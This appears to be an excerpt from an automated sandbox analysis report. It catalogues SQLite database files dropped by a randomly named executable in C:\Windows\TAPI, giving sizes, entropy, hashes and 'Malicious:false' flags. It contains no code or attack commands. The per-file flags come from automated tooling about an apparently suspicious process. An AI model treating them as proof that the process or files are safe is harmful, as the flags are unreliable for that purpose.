                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                        Entropy (8bit):0.037963276276857943
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                        MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                        SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                        SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                        SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
